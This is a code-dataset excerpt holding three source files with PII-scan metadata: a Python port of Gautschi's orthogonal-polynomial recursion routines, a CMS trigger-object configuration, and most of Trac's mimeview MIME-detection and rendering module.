https://www.cs.purdue.edu/archives/2002/wxg/codes/mm_log.m
"""
if a <= -1:
raise ValueError('Parameter a must be greater than -1')
prod = lambda z: reduce(lambda x, y: x * y, z, 1)
mm = np.zeros(N)
c = 1
for n in range(N):
if isinstance(a, int) and a < n:
p = range(n - a, n + a + 2)
mm[n] = (-1) ** (n - a) / prod(p)
mm[n] *= gamma(a + 1) ** 2
else:
if n == 0:
mm[0] = 1 / (a + 1) ** 2
else:
k = np.arange(1, n + 1)
s = 1 / (a + 1 + k) - 1 / (a + 1 - k)
p = (a + 1 - k) / (a + 1 + k)
mm[n] = (1 / (a + 1) + sum(s)) * prod(p) / (a + 1)
mm[n] *= c
c *= 0.5 * (n + 1) / (2 * n + 1)
return mm
def mod_chebyshev(N, mom, alpham, betam):
"""
Calcuate the recursion coefficients for the orthogonal polynomials
which are are orthogonal with respect to a weight function which is
represented in terms of its modifed moments which are obtained by
integrating the monic polynomials against the weight function.
References
----------
John C. Wheeler, "Modified moments and Gaussian quadratures"
Rocky Mountain Journal of Mathematics, Vol. 4, Num. 2 (1974), 287--296
Walter Gautschi, "Orthogonal Polynomials (in Matlab)
Journal of Computational and Applied Mathematics, Vol. 178 (2005) 215--234
Adapted from the MATLAB implementation:
https://www.cs.purdue.edu/archives/2002/wxg/codes/chebyshev.m
"""
if not isinstance(N, int):
raise TypeError('N must be an integer')
if N < 1:
raise ValueError('N must be at least 1')
N = min(N, int(len(mom) / 2))
alpha = np.zeros(N)
beta = np.zeros(N)
normsq = np.zeros(N)
sig = np.zeros((N + 1, 2 * N))
alpha[0] = alpham[0] + mom[1] / mom[0]
beta[0] = mom[0]
sig[1, :] = mom
for n in range(2, N + 1):
for m in range(n - 1, 2 * N - n + 1):
sig[n, m] = sig[n - 1, m + 1] - (alpha[n - 2] - alpham[m]) * sig[n - 1, m] - \
beta[n - 2] * sig[n - 2, m] + betam[m] * sig[n - 1, m - 1]
alpha[n - 1] = alpham[n - 1] + sig[n, n] / sig[n, n - 1] - sig[n - 1, n - 1] / \
sig[n - 1, n - 2]
beta[n - 1] = sig[n, n - 1] / sig[n - 1, n - 2]
normsq = np.diagonal(sig, -1)
return alpha, beta, normsq
def rec_jaclog(N, a):
"""
Generate the recursion coefficients alpha_k, beta_k
P_{k+1}(x) = (x-alpha_k)*P_{k}(x) - beta_k P_{k-1}(x)
for the monic polynomials which are orthogonal on [0,1]
with respect to the weight w(x)=x^a*log(1/x)
Inputs:
N - polynomial order
a - weight parameter
Outputs:
alpha - recursion coefficients
beta - recursion coefficients
Adated from the MATLAB code:
https://www.cs.purdue.edu/archives/2002/wxg/codes/r_jaclog.m
"""
alphaj, betaj = rec_jacobi01(2 * N, 0, 0)
mom = mm_log(2 * N, a)
alpha, beta, _ = mod_chebyshev(N, mom, alphaj, betaj)
return alpha, beta
| 10,886 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Greg von Winckel'], ['LOCATION', 'DAMAGES'], ['PERSON', 'WHETHER'], ['DATE_TIME', 'Wed Jan 1'], ['DATE_TIME', '2014'], ['PERSON', 'David A. Ham'], ['DATE_TIME', '2016'], ['PERSON', 'Walter Gautschi\n '], ['PERSON', 'Gene Golub'], ['DATE_TIME', 'April 1973'], ['LOCATION', 'P_{k+1}(x'], ['PERSON', 'Dirk Laurie'], ['PERSON', 'Walter Gautschi\n '], ['LOCATION', "ValueError('N"], ['PERSON', 'NOPT'], ['PERSON', 'Px'], ['PERSON', 'Px'], ['PERSON', 'NOPT'], ['PERSON', 'Walter Gautschi,``On'], ['PERSON', "James L. Blue''"], ['DATE_TIME', '33 (1979'], ['LOCATION', 'mm[0'], ['LOCATION', 'alpham'], ['PERSON', 'betam'], ['PERSON', 'John C. Wheeler'], ['NRP', 'Gaussian'], ['DATE_TIME', '1974'], ['PERSON', 'Walter Gautschi'], ['DATE_TIME', '2005'], ['LOCATION', "ValueError('N"], ['DATE_TIME', 'min(N'], ['LOCATION', 'rec_jaclog(N'], ['LOCATION', 'P_{k+1}(x'], ['URL', 'http://www.cs.purdue.edu/archives/2002/wxg/codes/gauss.m'], ['URL', 'http://www.cs.purdue.edu/archives/2002/wxg/codes/r_jacobi.m'], ['URL', 'https://www.cs.purdue.edu/archives/2002/wxg/codes/r_jacobi01.m'], ['URL', 'https://www.cs.purdue.edu/archives/2002/wxg/codes/mm_log.m'], ['URL', 'https://www.cs.purdue.edu/archives/2002/wxg/codes/chebyshev.m'], ['URL', 'https://www.cs.purdue.edu/archives/2002/wxg/codes/r_jaclog.m'], ['URL', 'orthopoly.py'], ['URL', 'email.com'], ['URL', 'numpy.li'], ['URL', 'np.re'], ['URL', 'numpy.li'], ['URL', 'np.ar'], ['URL', 'np.ar'], ['URL', 'np.ar'], ['URL', 'np.ar'], ['URL', 'np.ar'], ['URL', 'np.ar']] |
6 | ## @package TriggerObjectBlock_cfi
# Configuration file that defines the producer of ROOT-tuple for trigger objects.
#
# \author Subir Sarkar
# \author Rosamaria Venditti (INFN Bari, Bari University)
# \author Konstantin Androsov (University of Siena, INFN Pisa)
# \author Maria Teresa Grippo (University of Siena, INFN Pisa)
#
# Copyright 2011-2013 Subir Sarkar, Rosamaria Venditti (INFN Bari, Bari University)
# Copyright 2014 Konstantin Androsov dummy@email.com,
# Maria Teresa Grippo dummy@email.com
#
# This file is part of X->HH->bbTauTau.
#
# X->HH->bbTauTau is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# X->HH->bbTauTau is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with X->HH->bbTauTau. If not, see <http://www.gnu.org/licenses/>.
import FWCore.ParameterSet.Config as cms
triggerObjectBlock = cms.EDAnalyzer("TriggerObjectBlock",
verbosity = cms.int32(0),
hltInputTag = cms.InputTag('TriggerResults','','HLT'),
triggerEventTag = cms.InputTag('patTriggerEvent'),
hltPathsOfInterest = cms.vstring ("HLT_DoubleMu",
"HLT_Mu",
"HLT_IsoMu",
"HLT_TripleMu",
"IsoPFTau",
"TrkIsoT",
"HLT_Ele"),
May10ReRecoData = cms.bool(False)
)
| 1,844 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Subir Sarkar'], ['PERSON', 'Rosamaria Venditti'], ['PERSON', 'Konstantin Androsov'], ['PERSON', 'Maria Teresa Grippo'], ['DATE_TIME', '2011-2013'], ['PERSON', 'Subir Sarkar'], ['PERSON', 'Rosamaria Venditti'], ['DATE_TIME', '2014'], ['PERSON', 'Konstantin Androsov'], ['PERSON', 'Maria Teresa Grippo'], ['PERSON', 'triggerEventTag = cms'], ['PERSON', "InputTag('patTriggerEvent"], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'FWCore.ParameterSet.Co'], ['URL', 'cms.int'], ['URL', 'cms.In'], ['URL', 'cms.In'], ['URL', 'cms.bo']] |
7 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2004-2010 Edgewall Software
# Copyright (C) 2004 Daniel Lundin dummy@email.com
# Copyright (C) 2005-2006 Christopher Lenz dummy@email.com
# Copyright (C) 2006-2007 Christian Boos dummy@email.com
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
#
# Author: Daniel Lundin dummy@email.com
# Christopher Lenz dummy@email.com
# Christian Boos dummy@email.com
"""
File metadata management
------------------------
The `trac.mimeview` package centralizes the intelligence related to
file metadata, principally concerning the `type` (MIME type) of the
content and, if relevant, concerning the text encoding (charset) used
by the content.
There are primarily two approaches for getting the MIME type of a
given file, either taking advantage of existing conventions for the
file name, or examining the file content and applying various
heuristics.
The module also knows how to convert the file content from one type to
another type.
In some cases, only the `url` pointing to the file's content is
actually needed, that's why we avoid to read the file's content when
it's not needed.
The actual `content` to be converted might be a `unicode` object, but
it can also be the raw byte string (`str`) object, or simply an object
that can be `read()`.
.. note:: (for plugin developers)
The Mimeview API is quite complex and many things there are
currently a bit difficult to work with (e.g. what an actual
`content` might be, see the last paragraph of this description).
So this area is mainly in a ''work in progress'' state, which will
be improved along the lines described in :teo:`#3332`.
In particular, if you are interested in writing `IContentConverter`
and `IHTMLPreviewRenderer` components, note that those interfaces
will be merged into a new style `IContentConverter`. Feel free to
contribute remarks and suggestions for improvements to the
corresponding ticket (#3332 as well).
"""
import re
from StringIO import StringIO
from genshi import Markup, Stream
from genshi.core import TEXT, START, END, START_NS, END_NS
from genshi.builder import Fragment, tag
from genshi.input import HTMLParser
from trac.config import IntOption, ListOption, Option
from trac.core import *
from trac.resource import Resource
from trac.util import Ranges, content_disposition
from trac.util.text import exception_to_unicode, to_utf8, to_unicode
from trac.util.translation import _, tag_
__all__ = ['Context', 'Mimeview', 'RenderingContext', 'get_mimetype',
'is_binary', 'detect_unicode', 'content_to_unicode', 'ct_mimetype']
class RenderingContext(object):
"""
A rendering context specifies ''how'' the content should be rendered.
It holds together all the needed contextual information that will be
needed by individual renderer components.
To that end, a context keeps track of the Href instance (`.href`) which
should be used as a base for building URLs.
It also provides a `PermissionCache` (`.perm`) which can be used to
restrict the output so that only the authorized information is shown.
A rendering context may also be associated to some Trac resource which
will be used as the implicit reference when rendering relative links
or for retrieving relative content and can be used to retrieve related
metadata.
Rendering contexts can be nested, and a new context can be created from
an existing context using the call syntax. The previous context can be
retrieved using the `.parent` attribute.
For example, when rendering a wiki text of a wiki page, the context will
be associated to a resource identifying that wiki page.
If that wiki text contains a `[[TicketQuery]]` wiki macro, the macro will
set up nested contexts for each matching ticket that will be used for
rendering the ticket descriptions.
:since: version 0.11
"""
def __init__(self, resource, href=None, perm=None):
"""Directly create a `RenderingContext`.
:param resource: the associated resource
:type resource: `Resource`
:param href: an `Href` object suitable for creating URLs
:param perm: a `PermissionCache` object used for restricting the
generated output to "authorized" information only.
The actual `.perm` attribute of the rendering context will be bound
to the given `resource` so that fine-grained permission checks will
apply to that.
"""
self.parent = None #: The parent context, if any
self.resource = resource
self.href = href
self.perm = perm(resource) if perm and resource else perm
self._hints = None
@staticmethod
def from_request(*args, **kwargs):
""":deprecated: since 1.0, use `web_context` instead."""
from trac.web.chrome import web_context
return web_context(*args, **kwargs)
def __repr__(self):
path = []
context = self
while context:
if context.resource.realm: # skip toplevel resource
path.append(repr(context.resource))
context = context.parent
return '<%s %s>' % (type(self).__name__, ' - '.join(reversed(path)))
def child(self, resource=None, id=False, version=False, parent=False):
"""Create a nested rendering context.
`self` will be the parent for the new nested context.
:param resource: either a `Resource` object or the realm string for a
resource specification to be associated to the new
context. If `None`, the resource will be the same
as the resource of the parent context.
:param id: the identifier part of the resource specification
:param version: the version of the resource specification
:return: the new context object
:rtype: `RenderingContext`
>>> context = RenderingContext('wiki', 'WikiStart')
>>> ticket1 = Resource('ticket', 1)
>>> context.child('ticket', 1).resource == ticket1
True
>>> context.child(ticket1).resource is ticket1
True
>>> context.child(ticket1)().resource is ticket1
True
"""
if resource:
resource = Resource(resource, id=id, version=version,
parent=parent)
else:
resource = self.resource
context = RenderingContext(resource, href=self.href, perm=self.perm)
context.parent = self
# hack for context instances created by from_request()
# this is needed because various parts of the code rely on a request
# object being available, but that will hopefully improve in the
# future
if hasattr(self, 'req'):
context.req = self.req
return context
__call__ = child
def __contains__(self, resource):
"""Check whether a resource is in the rendering path.
The primary use for this check is to avoid to render the content of a
resource if we're already embedded in a context associated to that
resource.
:param resource: a `Resource` specification which will be checked for
"""
context = self
while context:
if context.resource and \
context.resource.realm == resource.realm and \
context.resource.id == resource.id:
# we don't care about version here
return True
context = context.parent
# Rendering hints
#
# A rendering hint is a key/value pairs that can influence renderers,
# wiki formatters and processors in the way they produce their output.
# The keys are strings, but the values could be anything.
#
# In nested contexts, the hints are inherited from their parent context,
# unless overriden locally.
def set_hints(self, **keyvalues):
"""Set rendering hints for this rendering context.
>>> ctx = RenderingContext('timeline')
>>> ctx.set_hints(wiki_flavor='oneliner', shorten_lines=True)
>>> t_ctx = ctx('ticket', 1)
>>> t_ctx.set_hints(wiki_flavor='html', preserve_newlines=True)
>>> (t_ctx.get_hint('wiki_flavor'), t_ctx.get_hint('shorten_lines'), \
t_ctx.get_hint('preserve_newlines'))
('html', True, True)
>>> (ctx.get_hint('wiki_flavor'), ctx.get_hint('shorten_lines'), \
ctx.get_hint('preserve_newlines'))
('oneliner', True, None)
"""
if self._hints is None:
self._hints = {}
hints = self._parent_hints()
if hints is not None:
self._hints.update(hints)
self._hints.update(keyvalues)
def get_hint(self, hint, default=None):
"""Retrieve a rendering hint from this context or an ancestor context.
>>> ctx = RenderingContext('timeline')
>>> ctx.set_hints(wiki_flavor='oneliner')
>>> t_ctx = ctx('ticket', 1)
>>> t_ctx.get_hint('wiki_flavor')
'oneliner'
>>> t_ctx.get_hint('preserve_newlines', True)
True
"""
hints = self._hints
if hints is None:
hints = self._parent_hints()
if hints is None:
return default
return hints.get(hint, default)
def has_hint(self, hint):
"""Test whether a rendering hint is defined in this context or in some
ancestor context.
>>> ctx = RenderingContext('timeline')
>>> ctx.set_hints(wiki_flavor='oneliner')
>>> t_ctx = ctx('ticket', 1)
>>> t_ctx.has_hint('wiki_flavor')
True
>>> t_ctx.has_hint('preserve_newlines')
False
"""
hints = self._hints
if hints is None:
hints = self._parent_hints()
if hints is None:
return False
return hint in hints
def _parent_hints(self):
p = self.parent
while p and p._hints is None:
p = p.parent
return p and p._hints
class Context(RenderingContext):
""":deprecated: old name kept for compatibility, use `RenderingContext`."""
# Some common MIME types and their associated keywords and/or file extensions
KNOWN_MIME_TYPES = {
'application/javascript': 'js',
'application/msword': 'doc dot',
'application/pdf': 'pdf',
'application/postscript': 'ps',
'application/rtf': 'rtf',
'application/x-sh': 'sh',
'application/x-csh': 'csh',
'application/x-troff': 'nroff roff troff',
'application/x-yaml': 'yml yaml',
'application/rss+xml': 'rss',
'application/xsl+xml': 'xsl',
'application/xslt+xml': 'xslt',
'image/x-icon': 'ico',
'image/svg+xml': 'svg',
'model/vrml': 'vrml wrl',
'text/css': 'css',
'text/html': 'html htm',
'text/plain': 'txt TXT text README INSTALL '
'AUTHORS COPYING ChangeLog RELEASE',
'text/xml': 'xml',
# see also TEXT_X_TYPES below
'text/x-csrc': 'c xs',
'text/x-chdr': 'h',
'text/x-c++src': 'cc CC cpp C c++ C++',
'text/x-c++hdr': 'hh HH hpp H',
'text/x-csharp': 'cs c# C#',
'text/x-diff': 'patch',
'text/x-eiffel': 'e',
'text/x-elisp': 'el',
'text/x-fortran': 'f',
'text/x-haskell': 'hs',
'text/x-ini': 'ini cfg',
'text/x-objc': 'm mm',
'text/x-ocaml': 'ml mli',
'text/x-makefile': 'make mk Makefile GNUMakefile',
'text/x-pascal': 'pas',
'text/x-perl': 'pl pm PL',
'text/x-php': 'php3 php4',
'text/x-python': 'py',
'text/x-pyrex': 'pyx',
'text/x-ruby': 'rb',
'text/x-scheme': 'scm',
'text/x-textile': 'txtl',
'text/x-vba': 'vb vba bas',
'text/x-verilog': 'v',
'text/x-vhdl': 'vhd',
}
for t in KNOWN_MIME_TYPES.keys():
types = KNOWN_MIME_TYPES[t].split()
if t.startswith('text/x-'):
types.append(t[len('text/x-'):])
KNOWN_MIME_TYPES[t] = types
# extend the above with simple (text/x-<something>: <something>) mappings
TEXT_X_TYPES = """
ada asm asp awk idl inf java ksh lua m4 mail psp rfc rst sql tcl tex zsh
"""
for x in TEXT_X_TYPES.split():
KNOWN_MIME_TYPES.setdefault('text/x-%s' % x, []).append(x)
# Default mapping from keywords/extensions to known MIME types:
MIME_MAP = {}
for t, exts in KNOWN_MIME_TYPES.items():
MIME_MAP[t] = t
for e in exts:
MIME_MAP[e] = t
# Simple builtin autodetection from the content using a regexp
MODE_RE = re.compile(r"""
\#!.+?env\s+(\w+) # 1. look for shebang with env
| \#!(?:[/\w.-_]+/)?(\w+) # 2. look for regular shebang
| -\*-\s*(?:mode:\s*)?([\w+-]+)\s*-\*- # 3. look for Emacs' -*- mode -*-
| vim:.*?(?:syntax|filetype|ft)=(\w+) # 4. look for VIM's syntax=<n>
""", re.VERBOSE)
def get_mimetype(filename, content=None, mime_map=MIME_MAP):
"""Guess the most probable MIME type of a file with the given name.
`filename` is either a filename (the lookup will then use the suffix)
or some arbitrary keyword.
`content` is either a `str` or an `unicode` string.
"""
suffix = filename.split('.')[-1]
if suffix in mime_map:
# 1) mimetype from the suffix, using the `mime_map`
return mime_map[suffix]
else:
mimetype = None
try:
import mimetypes
# 2) mimetype from the suffix, using the `mimetypes` module
mimetype = mimetypes.guess_type(filename)[0]
except Exception:
pass
if not mimetype and content:
match = re.search(MODE_RE, content[:1000] + content[-1000:])
if match:
mode = match.group(1) or match.group(2) or match.group(4) or \
match.group(3).lower()
if mode in mime_map:
# 3) mimetype from the content, using the `MODE_RE`
return mime_map[mode]
else:
if is_binary(content):
# 4) mimetype from the content, using`is_binary`
return 'application/octet-stream'
return mimetype
def ct_mimetype(content_type):
"""Return the mimetype part of a content type."""
return (content_type or '').split(';')[0].strip()
def is_binary(data):
"""Detect binary content by checking the first thousand bytes for zeroes.
Operate on either `str` or `unicode` strings.
"""
if isinstance(data, str) and detect_unicode(data):
return False
return '\0' in data[:1000]
def detect_unicode(data):
"""Detect different unicode charsets by looking for BOMs (Byte Order Mark).
Operate obviously only on `str` objects.
"""
if data.startswith('\xff\xfe'):
return 'utf-16-le'
elif data.startswith('\xfe\xff'):
return 'utf-16-be'
elif data.startswith('\xef\xbb\xbf'):
return 'utf-8'
else:
return None
def content_to_unicode(env, content, mimetype):
"""Retrieve an `unicode` object from a `content` to be previewed.
In case the raw content had an unicode BOM, we remove it.
>>> from trac.test import EnvironmentStub
>>> env = EnvironmentStub()
>>> content_to_unicode(env, u"\ufeffNo BOM! h\u00e9 !", '')
u'No BOM! h\\xe9 !'
>>> content_to_unicode(env, "\xef\xbb\xbfNo BOM! h\xc3\xa9 !", '')
u'No BOM! h\\xe9 !'
"""
mimeview = Mimeview(env)
if hasattr(content, 'read'):
content = content.read(mimeview.max_preview_size)
u = mimeview.to_unicode(content, mimetype)
if u and u[0] == u'\ufeff':
u = u[1:]
return u
class IHTMLPreviewRenderer(Interface):
"""Extension point interface for components that add HTML renderers of
specific content types to the `Mimeview` component.
.. note::
This interface will be merged with IContentConverter, as
conversion to text/html will simply be a particular content
conversion.
Note however that the IHTMLPreviewRenderer will still be
supported for a while through an adapter, whereas the
IContentConverter interface itself will be changed.
So if all you want to do is convert to HTML and don't feel like
following the API changes, you should rather implement this
interface for the time being.
"""
#: implementing classes should set this property to True if they
#: support text content where Trac should expand tabs into spaces
expand_tabs = False
#: indicate whether the output of this renderer is source code that can
#: be decorated with annotations
returns_source = False
def get_quality_ratio(mimetype):
"""Return the level of support this renderer provides for the `content`
of the specified MIME type. The return value must be a number between
0 and 9, where 0 means no support and 9 means "perfect" support.
"""
def render(context, mimetype, content, filename=None, url=None):
"""Render an XHTML preview of the raw `content` in a RenderingContext.
The `content` might be:
* a `str` object
* an `unicode` string
* any object with a `read` method, returning one of the above
It is assumed that the content will correspond to the given `mimetype`.
Besides the `content` value, the same content may eventually
be available through the `filename` or `url` parameters.
This is useful for renderers that embed objects, using <object> or
<img> instead of including the content inline.
Can return the generated XHTML text as a single string or as an
iterable that yields strings. In the latter case, the list will
be considered to correspond to lines of text in the original content.
"""
class IHTMLPreviewAnnotator(Interface):
"""Extension point interface for components that can annotate an XHTML
representation of file contents with additional information."""
def get_annotation_type():
"""Return a (type, label, description) tuple
that defines the type of annotation and provides human readable names.
The `type` element should be unique to the annotator.
The `label` element is used as column heading for the table,
while `description` is used as a display name to let the user
toggle the appearance of the annotation type.
"""
def get_annotation_data(context):
"""Return some metadata to be used by the `annotate_row` method below.
This will be called only once, before lines are processed.
If this raises an error, that annotator won't be used.
"""
def annotate_row(context, row, number, line, data):
"""Return the XHTML markup for the table cell that contains the
annotation data.
`context` is the context corresponding to the content being annotated,
`row` is the tr Element being built, `number` is the line number being
processed and `line` is the line's actual content.
`data` is whatever additional data the `get_annotation_data` method
decided to provide.
"""
class IContentConverter(Interface):
"""An extension point interface for generic MIME based content
conversion.
.. note:: This api will likely change in the future (see :teo:`#3332`)
"""
def get_supported_conversions():
"""Return an iterable of tuples in the form (key, name, extension,
in_mimetype, out_mimetype, quality) representing the MIME conversions
supported and
the quality ratio of the conversion in the range 0 to 9, where 0 means
no support and 9 means "perfect" support. eg. ('latex', 'LaTeX', 'tex',
'text/x-trac-wiki', 'text/plain', 8)"""
def convert_content(req, mimetype, content, key):
"""Convert the given content from mimetype to the output MIME type
represented by key. Returns a tuple in the form (content,
output_mime_type) or None if conversion is not possible."""
class Content(object):
"""A lazy file-like object that only reads `input` if necessary."""
def __init__(self, input, max_size):
self.input = input
self.max_size = max_size
self.content = None
def read(self, size=-1):
if size == 0:
return ''
if self.content is None:
self.content = StringIO(self.input.read(self.max_size))
return self.content.read(size)
def reset(self):
if self.content is not None:
self.content.seek(0)
class Mimeview(Component):
"""Generic HTML renderer for data, typically source code."""
required = True
renderers = ExtensionPoint(IHTMLPreviewRenderer)
annotators = ExtensionPoint(IHTMLPreviewAnnotator)
converters = ExtensionPoint(IContentConverter)
default_charset = Option('trac', 'default_charset', 'utf-8',
"""Charset to be used when in doubt.""")
tab_width = IntOption('mimeviewer', 'tab_width', 8,
"""Displayed tab width in file preview. (''since 0.9'')""")
max_preview_size = IntOption('mimeviewer', 'max_preview_size', 262144,
"""Maximum file size for HTML preview. (''since 0.9'')""")
mime_map = ListOption('mimeviewer', 'mime_map',
'text/x-dylan:dylan, text/x-idl:ice, text/x-ada:ads:adb',
doc="""List of additional MIME types and keyword mappings.
Mappings are comma-separated, and for each MIME type,
there's a colon (":") separated list of associated keywords
or file extensions. (''since 0.10'')""")
treat_as_binary = ListOption('mimeviewer', 'treat_as_binary',
'application/octet-stream, application/pdf, application/postscript, '
'application/msword,application/rtf,',
doc="""Comma-separated list of MIME types that should be treated as
binary data. (''since 0.11.5'')""")
def __init__(self):
self._mime_map = None
# Public API
def get_supported_conversions(self, mimetype):
"""Return a list of target MIME types in same form as
`IContentConverter.get_supported_conversions()`, but with the converter
component appended. Output is ordered from best to worst quality."""
converters = []
for converter in self.converters:
conversions = converter.get_supported_conversions() or []
for k, n, e, im, om, q in conversions:
if im == mimetype and q > 0:
converters.append((k, n, e, im, om, q, converter))
converters = sorted(converters, key=lambda i: i[-2], reverse=True)
return converters
def convert_content(self, req, mimetype, content, key, filename=None,
url=None):
"""Convert the given content to the target MIME type represented by
`key`, which can be either a MIME type or a key. Returns a tuple of
(content, output_mime_type, extension)."""
if not content:
return ('', 'text/plain;charset=utf-8', '.txt')
# Ensure we have a MIME type for this content
full_mimetype = mimetype
if not full_mimetype:
if hasattr(content, 'read'):
content = content.read(self.max_preview_size)
full_mimetype = self.get_mimetype(filename, content)
if full_mimetype:
mimetype = ct_mimetype(full_mimetype) # split off charset
else:
mimetype = full_mimetype = 'text/plain' # fallback if not binary
# Choose best converter
candidates = list(self.get_supported_conversions(mimetype) or [])
candidates = [c for c in candidates if key in (c[0], c[4])]
if not candidates:
raise TracError(
_("No available MIME conversions from %(old)s to %(new)s",
old=mimetype, new=key))
# First successful conversion wins
for ck, name, ext, input_mimettype, output_mimetype, quality, \
converter in candidates:
output = converter.convert_content(req, mimetype, content, ck)
if output:
return (output[0], output[1], ext)
raise TracError(
_("No available MIME conversions from %(old)s to %(new)s",
old=mimetype, new=key))
def get_annotation_types(self):
"""Generator that returns all available annotation types."""
for annotator in self.annotators:
yield annotator.get_annotation_type()
def render(self, context, mimetype, content, filename=None, url=None,
annotations=None, force_source=False):
"""Render an XHTML preview of the given `content`.
`content` is the same as an `IHTMLPreviewRenderer.render`'s
`content` argument.
The specified `mimetype` will be used to select the most appropriate
`IHTMLPreviewRenderer` implementation available for this MIME type.
If not given, the MIME type will be infered from the filename or the
content.
Return a string containing the XHTML text.
When rendering with an `IHTMLPreviewRenderer` fails, a warning is added
to the request associated with the context (if any), unless the
`disable_warnings` hint is set to `True`.
"""
if not content:
return ''
if not isinstance(context, RenderingContext):
raise TypeError("RenderingContext expected (since 0.11)")
# Ensure we have a MIME type for this content
full_mimetype = mimetype
if not full_mimetype:
if hasattr(content, 'read'):
content = content.read(self.max_preview_size)
full_mimetype = self.get_mimetype(filename, content)
if full_mimetype:
mimetype = ct_mimetype(full_mimetype) # split off charset
else:
mimetype = full_mimetype = 'text/plain' # fallback if not binary
# Determine candidate `IHTMLPreviewRenderer`s
candidates = []
for renderer in self.renderers:
qr = renderer.get_quality_ratio(mimetype)
if qr > 0:
candidates.append((qr, renderer))
candidates.sort(lambda x, y: cmp(y[0], x[0]))
# Wrap file-like object so that it can be read multiple times
if hasattr(content, 'read'):
content = Content(content, self.max_preview_size)
# First candidate which renders successfully wins.
# Also, we don't want to expand tabs more than once.
expanded_content = None
for qr, renderer in candidates:
if force_source and not getattr(renderer, 'returns_source', False):
continue # skip non-source renderers in force_source mode
if isinstance(content, Content):
content.reset()
try:
ann_names = ', '.join(annotations) if annotations else \
'no annotations'
self.log.debug('Trying to render HTML preview using %s [%s]',
renderer.__class__.__name__, ann_names)
# check if we need to perform a tab expansion
rendered_content = content
if getattr(renderer, 'expand_tabs', False):
if expanded_content is None:
content = content_to_unicode(self.env, content,
full_mimetype)
expanded_content = content.expandtabs(self.tab_width)
rendered_content = expanded_content
result = renderer.render(context, full_mimetype,
rendered_content, filename, url)
if not result:
continue
if not (force_source or getattr(renderer, 'returns_source',
False)):
# Direct rendering of content
if isinstance(result, basestring):
if not isinstance(result, unicode):
result = to_unicode(result)
return Markup(to_unicode(result))
elif isinstance(result, Fragment):
return result.generate()
else:
return result
# Render content as source code
if annotations:
m = context.req.args.get('marks') if context.req else None
return self._render_source(context, result, annotations,
m and Ranges(m))
else:
if isinstance(result, list):
result = Markup('\n').join(result)
return tag.div(class_='code')(tag.pre(result)).generate()
except Exception, e:
self.log.warning('HTML preview using %s failed: %s',
renderer.__class__.__name__,
exception_to_unicode(e, traceback=True))
if context.req and not context.get_hint('disable_warnings'):
from trac.web.chrome import add_warning
add_warning(context.req,
_("HTML preview using %(renderer)s failed (%(err)s)",
renderer=renderer.__class__.__name__,
err=exception_to_unicode(e)))
def _render_source(self, context, stream, annotations, marks=None):
from trac.web.chrome import add_warning
annotators, labels, titles = {}, {}, {}
for annotator in self.annotators:
atype, alabel, atitle = annotator.get_annotation_type()
if atype in annotations:
labels[atype] = alabel
titles[atype] = atitle
annotators[atype] = annotator
annotations = [a for a in annotations if a in annotators]
if isinstance(stream, list):
stream = HTMLParser(StringIO(u'\n'.join(stream)))
elif isinstance(stream, unicode):
text = stream
def linesplitter():
for line in text.splitlines(True):
yield TEXT, line, (None, -1, -1)
stream = linesplitter()
annotator_datas = []
for a in annotations:
annotator = annotators[a]
try:
data = (annotator, annotator.get_annotation_data(context))
except TracError, e:
self.log.warning("Can't use annotator '%s': %s", a, e.message)
add_warning(context.req, tag.strong(
tag_("Can't use %(annotator)s annotator: %(error)s",
annotator=tag.em(a), error=tag.pre(e.message))))
data = (None, None)
annotator_datas.append(data)
def _head_row():
return tag.tr(
[tag.th(labels[a], class_=a, title=titles[a])
for a in annotations] +
[tag.th(u'\xa0', class_='content')]
)
def _body_rows():
for idx, line in enumerate(_group_lines(stream)):
row = tag.tr()
if marks and idx + 1 in marks:
row(class_='hilite')
for annotator, data in annotator_datas:
if annotator:
annotator.annotate_row(context, row, idx+1, line, data)
else:
row.append(tag.td())
row.append(tag.td(line))
yield row
return tag.table(class_='code')(
tag.thead(_head_row()),
tag.tbody(_body_rows())
)
def get_max_preview_size(self):
""":deprecated: use `max_preview_size` attribute directly."""
return self.max_preview_size
def get_charset(self, content='', mimetype=None):
"""Infer the character encoding from the `content` or the `mimetype`.
`content` is either a `str` or an `unicode` object.
The charset will be determined using this order:
* from the charset information present in the `mimetype` argument
* auto-detection of the charset from the `content`
* the configured `default_charset`
"""
if mimetype:
ctpos = mimetype.find('charset=')
if ctpos >= 0:
return mimetype[ctpos + 8:].strip()
if isinstance(content, str):
utf = detect_unicode(content)
if utf is not None:
return utf
return self.default_charset
@property
def mime_map(self):
# Extend default extension to MIME type mappings with configured ones
if not self._mime_map:
self._mime_map = MIME_MAP.copy()
for mapping in self.config['mimeviewer'].getlist('mime_map'):
if ':' in mapping:
assocations = mapping.split(':')
for keyword in assocations: # Note: [0] kept on purpose
self._mime_map[keyword] = assocations[0]
return self._mime_map
def get_mimetype(self, filename, content=None):
"""Infer the MIME type from the `filename` or the `content`.
`content` is either a `str` or an `unicode` object.
Return the detected MIME type, augmented by the
charset information (i.e. "<mimetype>; charset=..."),
or `None` if detection failed.
"""
mimetype = get_mimetype(filename, content, self.mime_map)
charset = None
if mimetype:
charset = self.get_charset(content, mimetype)
if mimetype and charset and not 'charset' in mimetype:
mimetype += '; charset=' + charset
return mimetype
def is_binary(self, mimetype=None, filename=None, content=None):
"""Check if a file must be considered as binary."""
if not mimetype and filename:
mimetype = self.get_mimetype(filename, content)
if mimetype:
mimetype = ct_mimetype(mimetype)
if mimetype in self.treat_as_binary:
return True
if content is not None and is_binary(content):
return True
return False
def to_utf8(self, content, mimetype=None):
"""Convert an encoded `content` to utf-8.
:deprecated: since 0.10, you should use `unicode` strings only.
